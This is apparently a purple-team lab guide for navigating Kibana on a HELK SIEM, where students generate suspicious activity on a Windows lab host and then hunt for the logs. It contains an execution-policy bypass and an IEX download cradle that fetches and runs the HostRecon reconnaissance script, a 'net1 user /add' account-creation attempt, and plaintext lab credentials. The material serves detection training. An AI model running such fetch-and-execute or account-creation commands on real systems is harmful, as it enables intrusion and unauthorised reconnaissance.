L0350 Navigating Kibana

Lab Overview

Kibana is the web interface frontend for the Elastic stack. This interface provides a multitude of configuration options and visibility for the ingestors associated with the Elastic stack.

This short guide provides a cursory overview of the Kibana interface, discovery options, dashboards, and search functions.

Access the Kibana Discovery Dashboard interface and navigate its various form controls.


Step One Kibana Navigation

In L0340 you accessed Kibana to verify the threat optics pipelines were operating correctly. Use the same connection method to log in to Kibana for L0350.

Login to Member Server (WS01)

Connect via Remote Desktop to the Member Server (WS01).
See Lab L0200 for connection instructions.

Access Kibana on the (H)ELK SIEM

Using Chrome or Internet Explorer on the Member Server, browse to the Kibana URL and log in using the credentials below.

URL: https://10.10.98.20
Username: helk
Password: hunting

Kibana Components

There are several components that a purple teamer will use when hunting for IOCs. Use the following guide to better understand the typical use case of some of the dashboard controls.

The left-hand side of the Kibana application includes a menu dock. By default this menu is "undocked": when undocked, the options collapse into icons whenever the menu is not in use. For first-time users of Kibana, the icons may not be self-evident. Docking the menu pins it open on the left-hand side of the application and displays both icons and text for each menu item to help the user navigate.

Dock the menu by first opening the menu by clicking on the "Expand" icon, and then clicking on the "Dock" icon. Both are at the bottom of the menu dock.

Discover Dashboard

Open the Discover Dashboard by selecting the "Discover" option from the menu dock. When the Discover Dashboard opens, take note of the currently selected index pattern. The index pattern is the initial filter that applies to the Discover Dashboard.

The logs* index pattern will typically include all data within ELK; however, hunting effectively without selecting a narrower initial filter may be hindered by the sheer volume of logs.

Discover Filters

In the image below, note the three defined filters that further scope your hunting dataset.

Clicking the "(change)" link on the Log Index will list the available log indices that (H)ELK is aware of. Indices can be generated manually, imported from code, or automatically provisioned by ELK as new data pipelines are seen for the first time. Wild-card (*) selections are available when selecting an index and allow the hunter to perform hunts across multiple data schemas (indices) at once.


Step Two Kibana Interface Continued

In this step, we will perform actions on the Member Server (WS01) that will generate logs, eventually accessible via the Kibana instance.

Login to Member Server (WS01)

Connect via Remote Desktop to the Member Server (WS01).
See Lab L0200 for connection instructions.

PowerShell

Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Generate Suspicious Behavior

In PowerShell, let's run a regular command-line tool and attempt to create a new user account named "appliedDemo" with the password "aptclass!". The command will ultimately fail to create the user account. This is expected.

PowerShell Input

net1 user appliedDemo aptclass! /add

PowerShell Output

PS C:\Users\itadmin> net1 user appliedDemo aptclass! /add
The password does not meet the password policy requirements. Check the minimum password length, password complexity and
password history requirements.

More help is available by typing NET HELPMSG 2245.

Despite the error message, was this enough activity to be visible in Kibana?

That one command created multiple log entries that should now be visible in Kibana's interface. The logs were captured at various stages of system activity and by various optics, all forwarded and delivered through the optics pipeline and made available in Kibana.
If the logs are missing, the Date/Time filter may be restricting your search scope.

Calendar Date/Time Control & Auto Refresh

If the net1 command was executed outside the currently selected time window, the Date/Time filter may need to be adjusted. This can be done from the Calendar control filter. On the right side of the Discover application, a refresh timer can also be set under the "Refresh every" option. This re-runs the search query on a defined refresh interval. Select the Calendar control on the Dashboard to see the filter options.

Note the highlighted fields on the Calendar control. Modify the Calendar control to enable an automatic refresh of the search query every 30 seconds.

Next, search for the term "powershell". Review the results in Kibana briefly. Then return to the PowerShell window on the Member Server WS01 and enter a powershell command.

PowerShell Input

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

PowerShell Output


PS C:\Users\itadmin> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Forest                  : labs.local
DomainControllers       : {dc01.labs.local}
Children                : {}
DomainMode              : Windows2012R2Domain
DomainModeLevel         : 6
Parent                  :
PdcRoleOwner            : dc01.labs.local
RidRoleOwner            : dc01.labs.local
InfrastructureRoleOwner : dc01.labs.local
Name                    : labs.local

Return to the Kibana instance and wait approximately one minute. Was evidence returned of the PowerShell command executed on WS01? Within two minutes, the screen should refresh and the new event logs should be displayed at the top of the query table.

Column Field Controls

Open one of the returned documents by pressing the down arrow next to the document to expand its contents. Next to each field is a set of icons. Hovering the mouse cursor over the third icon shows the tooltip "Toggle column in table". Selecting this adds the field as a column in the current table of documents (records/rows). Selecting the option again removes the field from the table's columns.

Review the list of fields. Which fields would be most useful to display as a column in the table view? Find a field named "process_command_line". It might be difficult to find a specific document that contains this field, so scroll through the entire field list displayed on the left-hand side of the table instead. When you find it, hover your mouse over the field and press the "Add" button. This adds the field as a column in the table, even if the currently queried documents do not contain that field.

Great! Onward to the next step.


Step Three Create and Hunt Suspicious Logs

Next, let’s make more interesting logs to ensure our optics infrastructure is working properly.

Login to Member Server (WS01)

Connect via Remote Desktop to the Member Server (WS01).
See Lab L0200 for connection instructions.

PowerShell

Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.

Confirm User Context

First, confirm the correct user and system context by using the "whoami" and "hostname" commands.

PowerShell Input

whoami
hostname

PowerShell Output

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01    <-----------------------------------VERIFY RESULT

If the result of the above commands differs, please confirm you are operating on the correct system and user context.

Suspicious Activity (Make Some Noise)

From the PowerShell window execute the following commands one at a time.
• The first command will instantiate a PowerShell session that allows unsigned scripts to run.
• The second command instantiates a memory cradle (memory carved for a PowerShell function).
• The third command executes the HostRecon script and performs an analysis of the local system.

PowerShell Input

Set-ExecutionPolicy bypass -Force
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/HostRecon/master/HostRecon.ps1')
Invoke-HostRecon |Out-File recon.txt

PowerShell Output

Please make note that the warning below is specific to an antivirus product and is expected in this context.

PS C:\Users\itadmin> Set-ExecutionPolicy bypass -Force
PS C:\Users\itadmin> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS C:\Users\itadmin> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/HostRecon
/master/HostRecon.ps1')
PS C:\Users\itadmin> Invoke-HostRecon |Out-File recon.txt
Get-WmiObject : Invalid class "AntiVirusProduct"
At line:195 char:11
+     $AV = Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SEL ...
+           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidType: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

PS C:\Users\itadmin>

You may receive an error as the tool attempts to enumerate information about the host. We are most interested in whether this behavior was captured by the threat optics.

Next, return to the Kibana interface.

Hunting for PowerShell

As before, we will search for the PowerShell activity that has been captured by the threat optics. In this case, however, we will first narrow our scope further by changing the selected index.

Change Selected Index

Let's change the index to the one that we expect PowerShell commands to be parsed into. With the previous optics configuration, the net result in Elastic is an index named logs-endpoint-winevent-powershell-*. Select that index from the list of indices.

Next, enter search term "HostRecon" and press enter.

Were you able to find the record of the PowerShell Invoke command?
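The same search can be run from PowerShell against the (H)ELK Elasticsearch backend, which is useful for seeing what the Discover controls from Step Two (Date/Time window, "Refresh every") and Step Three (index pattern, search term) translate to. This is an added example, not part of the lab or of HELK; it assumes Elasticsearch is reachable on the HELK host at port 9200 and accepts the Kibana credentials, and that events carry an @timestamp field alongside process_command_line.

```powershell
# Added example, not part of the lab. ASSUMPTIONS: Elasticsearch listens on
# http://10.10.98.20:9200 (Kibana's address from the lab plus the default
# Elasticsearch port) and accepts the Kibana credentials. Drop -Credential if
# your HELK build runs Elasticsearch without authentication.
$EsUri      = 'http://10.10.98.20:9200'
$Credential = New-Object System.Management.Automation.PSCredential(
    'helk', (ConvertTo-SecureString 'hunting' -AsPlainText -Force))

function Search-HelkEvents {
    param(
        [string]$IndexPattern = 'logs-endpoint-winevent-powershell-*',  # index chosen in Step Three
        [string]$Term         = 'HostRecon',                             # search term from Step Three
        [string]$Since        = 'now-15m',                               # Kibana's default Date/Time window
        [int]   $Size         = 20
    )
    # Same shape as a Discover search: free-text query, time-range filter, newest first.
    # '@timestamp' is the usual Logstash event time field (assumed for HELK here).
    $body = @{
        size  = $Size
        sort  = @(@{ '@timestamp' = 'desc' })
        query = @{
            bool = @{
                must   = @(@{ query_string = @{ query = $Term } })
                filter = @(@{ range = @{ '@timestamp' = @{ gte = $Since; lte = 'now' } } })
            }
        }
    } | ConvertTo-Json -Depth 10

    $resp = Invoke-RestMethod -Method Post -Uri "$EsUri/$IndexPattern/_search" `
        -Credential $Credential -ContentType 'application/json' -Body $body
    # Return just the documents, as the table in Discover would show them
    return $resp.hits.hits | ForEach-Object { $_._source }
}

# Poll on the same cadence as the "Refresh every 30 seconds" option from Step Two
for ($i = 0; $i -lt 4; $i++) {
    $hits = Search-HelkEvents
    "{0:u}  {1} matching event(s)" -f (Get-Date), @($hits).Count
    # process_command_line is the column added in Step Two; other fields will vary by optic
    $hits | Format-Table '@timestamp', process_command_line -AutoSize
    Start-Sleep -Seconds 30
}
```

Widening $Since (for example 'now-24h') is the script equivalent of moving the Calendar control when the events fall outside the default window.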

You've completed the optics-infrastructure install, created suspicious logs and confirmed your ability to hunt for those logs. While these hunt scenarios use specific search terms, our goal was only to ensure that the optics had been installed and were working properly. In future labs we will be hunting for specific threats with refined keywords and indexing.


Lab Complete